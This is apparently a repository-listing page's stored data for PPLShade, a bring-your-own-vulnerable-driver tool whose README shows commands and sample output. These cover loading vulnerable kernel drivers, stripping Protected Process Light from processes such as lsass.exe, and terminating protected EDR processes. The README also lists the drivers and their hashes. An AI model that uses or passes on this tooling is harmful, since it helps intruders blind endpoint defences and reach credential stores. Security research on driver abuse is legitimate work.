[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81882":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":16,"stars7d":17,"stars30d":13,"stars90d":15,"forks30d":15,"starsTrendScore":18,"compositeScore":19,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":20,"fork":20,"defaultBranch":21,"hasWiki":22,"hasPages":20,"topics":23,"createdAt":10,"pushedAt":10,"updatedAt":29,"readmeContent":30,"aiSummary":31,"trendingCount":15,"starSnapshotCount":15,"syncStatus":32,"lastSyncTime":33,"discoverSource":34},81882,"PPLShade","redteamfortress\u002FPPLShade","redteamfortress","BYOVD tool for manipulating Windows Protected Process Light (PPL) protection at the kernel level.","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fjehadabudagga\u002F",null,"C",71,23,48,0,4,13,15,57.94,false,"main",true,[24,25,26,27,28],"byovd","edr","edr-bypass","edr-evasion","kernel-driver","2026-06-12 04:01:35","\u003Cp align=\"center\">\n \u003Cimg src=\"image.png\" alt=\"PPLShade Banner\" width=\"100%\">\n\u003C\u002Fp>\n\n# PPLShade\n\nMulti-driver BYOVD tool for manipulating Windows Protected Process Light (PPL) protection at the kernel level. Auto-detects loaded drivers, resolves EPROCESS offsets dynamically, and reads\u002Fwrites kernel memory through physical memory mapping.\n\nTested on Windows 10\u002F11 x64.\n\n## Features\n\n- **Auto-detect** — probes all supported driver symlinks, uses whichever is loaded\n- **Driver loader** — copies driver to `System32\\drivers` with a random name, creates and starts the service\n- **List** — enumerate all protected processes with protection level, signer type, signature levels, and kernel address\n- **Get \u002F Set \u002F Protect** — query or modify protection level and signer type on any process\n- **Unprotect** — strip PP\u002FPPL protection and signature levels from any process\n- **Kill** — unprotect + terminate any protected process (including EDR)\n- **Dynamic offsets** — resolves EPROCESS fields from ntoskrnl exports at runtime, no hardcoded offsets\n- **Static CRT** — `\u002FMT` build, single standalone exe, no vcredist dependency\n\n## Usage\n\n```\nPPLShade.exe load \u003Cdriver.sys> Load driver with random service name\nPPLShade.exe unload Stop + delete driver service + cleanup\n\nPPLShade.exe list List all protected processes\nPPLShade.exe get \u003CPID> Query protection of a process\nPPLShade.exe set \u003CPID> \u003CPP|PPL> \u003CT> Change protection level + signer\nPPLShade.exe protect \u003CPID> \u003CPP|PPL> \u003CT> Add protection to unprotected process\nPPLShade.exe unprotect \u003CPID> Strip all protection\nPPLShade.exe kill \u003CPID> Unprotect + terminate\n```\n\n**Signer types:** `Authenticode`, `CodeGen`, `Antimalware`, `Lsa`, `Windows`, `WinTcb`, `WinSystem`, `App`\n\n## Examples\n\n### Load a driver\n```\nPS C:\\> .\\PPLShade.exe load LECOMAx64.sys\n [>] Copying driver to C:\\Windows\\System32\\drivers\\xkqmftab.sys\n [*] Driver copied\n [>] Creating service: xkqmftab\n [*] Service created\n [>] Starting driver...\n [*] Driver started\n [*] Service name: xkqmftab\n [*] Driver path: C:\\Windows\\System32\\drivers\\xkqmftab.sys\n [>] Run 'unload' to stop and clean up when done.\n```\n\n### List protected processes\n```\nPS C:\\> .\\PPLShade.exe list\n [>] Initializing...\n [*] Ready\n [>] Mapping...\n [*] Ready\n [>] Probing drivers...\n [*] Detected: mtxvxd\n\n PID | Process | Level | Signer | EXE Sig Level | DLL Sig Level | Kernel Addr\n -------+----------------------+--------+-----------------+----------------------+----------------------+--------------------\n 4 | System | PP (2) | WinSystem (7) | WindowsTcb (0x1e) | Windows (0x1c) | 0xffff990660694040\n 172 | Registry | PP (2) | WinSystem (7) | Unchecked (0x00) | Unchecked (0x00) | 0xffff990660763080\n 584 | smss.exe | PPL(1) | WinTcb (6) | WindowsTcb (0x3e) | Windows (0x0c) | 0xffff99066d229040\n 968 | services.exe | PPL(1) | WinTcb (6) | WindowsTcb (0x3e) | Windows (0x0c) | 0xffff99066c0890c0\n 664 | lsass.exe | PPL(1) | Lsa (4) | Windows (0x3c) | Microsoft (0x08) | 0xffff99066c096080\n\n [*] Enumerated 16 protected processes out of 162 total\n```\n\n### Get process protection\n```\nPS C:\\> .\\PPLShade.exe get 664\n [>] Initializing...\n [*] Ready\n [>] Mapping...\n [*] Ready\n [>] Probing drivers...\n [*] Detected: mtxvxd\n\n [*] PID 664 (lsass.exe) is PPL-Lsa (signer=4)\n [>] EXE Sig: Windows (0x3C)\n [>] DLL Sig: Microsoft (0x08)\n [>] KAddr: 0xFFFF99066C096080\n```\n\n### Unprotect a process\n```\nPS C:\\> .\\PPLShade.exe unprotect 3532\n [>] Initializing...\n [*] Ready\n [>] Mapping...\n [*] Ready\n [>] Probing drivers...\n [*] Detected: mtxvxd\n\n [*] PID 3532 unprotected (was PPL-Lsa)\n```\n\n### Kill a protected process\n```\nPS C:\\> .\\PPLShade.exe kill 3532\n [>] Initializing...\n [*] Ready\n [>] Mapping...\n [*] Ready\n [>] Probing drivers...\n [*] Detected: mtxvxd\n\n [*] PID 3532 unprotected (was PPL-Lsa)\n [*] PID 3532 terminated\n```\n\n### Protect a process\n```\nPS C:\\> .\\PPLShade.exe protect 1234 PPL WinTcb\n [>] Initializing...\n [*] Ready\n [>] Mapping...\n [*] Ready\n [>] Probing drivers...\n [*] Detected: mtxvxd\n\n [*] PID 1234: protection set to PPL-WinTcb (was None-None)\n [*] PID 1234 is now fully protected with signature levels WindowsTcb \u002F Windows\n```\n\n### Unload driver\n```\nPS C:\\> .\\PPLShade.exe unload\n [>] Stopping service: xkqmftab\n [*] Driver stopped\n [*] Service deleted\n [*] Driver file deleted: C:\\Windows\\System32\\drivers\\xkqmftab.sys\n [*] Cleanup complete\n```\n\n## Supported Drivers\n\n| Driver | Symlink | SHA256 |\n|--------|---------|--------|\n| LECOMAx64.sys | `\\\\.\\LECOMA64_2` | `0F2DFF4116A84241D8CAFE534B63454FB4EA26272DA8977BE03670701EC6631C` |\n| ipctype.sys | `\\\\.\\IPCType` | `8E2ACCE10D704C8B511C8B6211A2BE5D8E4ADE91EBCBDA2AC10018E4C0AE99FB` |\n| mtxC9CB.sys | `\\\\.\\DosMtxVxd` | `0414C0D5BB6DDBCC84B3D59CE411ACF1ED8B17D17054C6192E0A7594B5146D60` |\n\nAll three use MmMapIoSpace to map physical memory into usermode. SuperFetch (`NtQuerySystemInformation`) provides VA→PA translation.\n\n## Build\n\n1. Open `PPLShade.sln` in Visual Studio 2022\n2. Make sure C++ Language Standard is set to **Preview - Features from the Latest C++ Working Draft (\u002Fstd:c++latest)** — the SuperFetch VA→PA translation layer uses `std::expected` which requires this\n3. Build **Release | x64**\n\n## Disclaimer\n\nThis tool is provided for **educational and authorized security research purposes only**. Use of this tool against systems you do not own or have explicit written permission to test is illegal. The author is not responsible for any misuse or damage caused by this tool.\n\n## Credits\n\n**Jehad Abudagga** ([@j3h4ck](https:\u002F\u002Fx.com\u002Fj3h4ck))\n\n[![LinkedIn](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLinkedIn-jehadabudagga-blue?logo=linkedin)](https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fjehadabudagga\u002F)\n[![Twitter](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FX-@j3h4ck-black?logo=x)](https:\u002F\u002Fx.com\u002Fj3h4ck)\n[![Telegram](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FTelegram-@j3h4ck-blue?logo=telegram)](https:\u002F\u002Ft.me\u002Fj3h4ck)\n[![Medium](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FMedium-@jehadbudagga-black?logo=medium)](https:\u002F\u002Fmedium.com\u002F@jehadbudagga)\n[![GitHub](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FGitHub-redteamfortress-black?logo=github)](https:\u002F\u002Fgithub.com\u002Fredteamfortress)\n","PPLShade 是一个用于在内核级别操作 Windows 受保护进程轻量级(PPL)保护的自带漏洞驱动工具。其核心功能包括自动检测加载的驱动程序、动态解析 EPROCESS 偏移量以及通过物理内存映射读写内核内存,支持列出所有受保护进程及其详细信息、查询或修改进程的保护级别和签名类型、移除保护及终止受保护进程等。该工具采用 C 语言编写,编译为静态 CRT 单文件可执行程序,无需额外依赖。PPLShade 适用于安全研究人员和渗透测试者评估和绕过端点检测与响应(EDR)系统中的 PPL 机制,在 Windows 10\u002F11 x64 环境下经过测试验证。",2,"2026-06-11 04:07:03","CREATED_QUERY"]